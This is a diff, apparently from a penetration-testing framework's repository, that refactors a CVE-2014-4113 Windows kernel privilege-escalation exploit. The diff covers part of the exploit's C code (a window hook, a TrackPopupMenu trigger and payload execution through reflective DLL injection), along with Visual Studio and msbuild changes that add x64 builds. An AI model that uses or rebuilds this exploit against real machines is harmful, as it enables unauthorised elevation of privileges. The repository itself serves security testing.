if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) { if (SetWindowsHookExA(WH_CALLWNDPROC, hook_callback, NULL, GetCurrentThreadId()) == NULL)
LogMessage("[!] SetWindowsHookExA failed :-(\n"); {
DestroyMenu(MenuTwo); dprintf("[!] SetWindowsHookExA failed :-(");
DestroyMenu(MenuOne); DestroyMenu(hMenuTwo);
DestroyMenu(hMenuOne);
return; return;
} }
// 'crash' it! // 'crash' it!
TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL); TrackPopupMenu(hMenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
// If everything worked process should be privileges at this point // If everything worked process should be privileges at this point
LogMessage("[!] Executing payload..."); dprintf("[!] Executing payload...");
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL); CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return;
} }
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE; BOOL bReturnValue = TRUE;
switch (dwReason) { switch (dwReason)
{
case DLL_QUERY_HMODULE: case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL; hAppInstance = hinstDLL;
if (lpReserved != NULL) { if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance; *(HMODULE *)lpReserved = hAppInstance;
} }
break; break;
case DLL_PROCESS_ATTACH: case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL; hAppInstance = hinstDLL;
Win32kNullPage(lpReserved); win32k_null_page(lpReserved);
break; break;
case DLL_PROCESS_DETACH: case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH: case DLL_THREAD_ATTACH:
@ -487,4 +496,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
break; break;
} }
return bReturnValue; return bReturnValue;
}; }

240
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj vendored
View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32"> <ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration> <Configuration>Debug</Configuration>
@ -19,132 +19,224 @@
</ProjectConfiguration> </ProjectConfiguration>
</ItemGroup> </ItemGroup>
<PropertyGroup Label="Globals"> <PropertyGroup Label="Globals">
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid> <ProjectGuid>{E80F11CD-6698-492F-B4B0-1A2348A24BB0}</ProjectGuid>
<RootNamespace>cve20144113</RootNamespace> <RootNamespace>cve-2014-4113</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType> <ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset> <WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType> <ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset> <WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings"> <ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup> </ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup> </ImportGroup>
<PropertyGroup Label="UserMacros" /> <PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <PropertyGroup>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath> <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
</PropertyGroup> <OutDir>$(Configuration)\$(Platform)\</OutDir>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <IntDir>$(Configuration)\$(Platform)\</IntDir>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath> <LinkIncremental>false</LinkIncremental>
</PropertyGroup> <GenerateManifest>false</GenerateManifest>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath> <CodeAnalysisRules />
</PropertyGroup> <CodeAnalysisRuleAssemblies />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup> </PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <SubSystem>Windows</SubSystem>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <SubSystem>Windows</SubSystem>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs> <Optimization>MinSpace</Optimization>
<WarningLevel>Level3</WarningLevel> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<Optimization>Disabled</Optimization> <IntrinsicFunctions>false</IntrinsicFunctions>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<CompileAs>Default</CompileAs> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <GenerateMapFile>true</GenerateMapFile>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<CompileAs>CompileAsC</CompileAs> <Optimization>MinSpace</Optimization>
<WarningLevel>Level3</WarningLevel> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<Optimization>Disabled</Optimization> <IntrinsicFunctions>false</IntrinsicFunctions>
<FunctionLevelLinking>true</FunctionLevelLinking> <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<IntrinsicFunctions>true</IntrinsicFunctions> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<CompileAs>Default</CompileAs> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<TreatWarningAsError>true</TreatWarningAsError>
</ClCompile> </ClCompile>
<Link> <Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences> <GenerateMapFile>true</GenerateMapFile>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile> <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link> </Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>
<ClCompile Include="cve-2014-4113.c" /> <ClCompile Include="cve-2014-4113.c" />
</ItemGroup> </ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets"> <ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup> </ImportGroup>
</Project> </Project>

7
external/source/exploits/cve-2014-4113/make.msbuild vendored
View File

@ -4,14 +4,15 @@
<SolutionPath>.\cve-2014-4113.sln</SolutionPath> <SolutionPath>.\cve-2014-4113.sln</SolutionPath>
</PropertyGroup> </PropertyGroup>
<Target Name="all" DependsOnTargets="x86" /> <Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86"> <Target Name="x86">
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" /> <Message Text="Building CVE-2014-4113 track_popup_menu x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target> </Target>
<Target Name="x64"> <Target Name="x64">
<Message Text="CVE-2014-4113 is not supported in x64" /> <Message Text="Building CVE-2014-4113 track_popup_menu x64 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target> </Target>
</Project> </Project>

2
external/source/exploits/make.bat vendored
View File

@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" (
) )
IF "%ERRORLEVEL%"=="0" ( IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2014-4113 (win32k_null_page)" ECHO "Building CVE-2014-4113 (track_popup_menu)"
PUSHD CVE-2014-4113 PUSHD CVE-2014-4113
msbuild.exe make.msbuild /target:%PLAT% msbuild.exe make.msbuild /target:%PLAT%
POPD POPD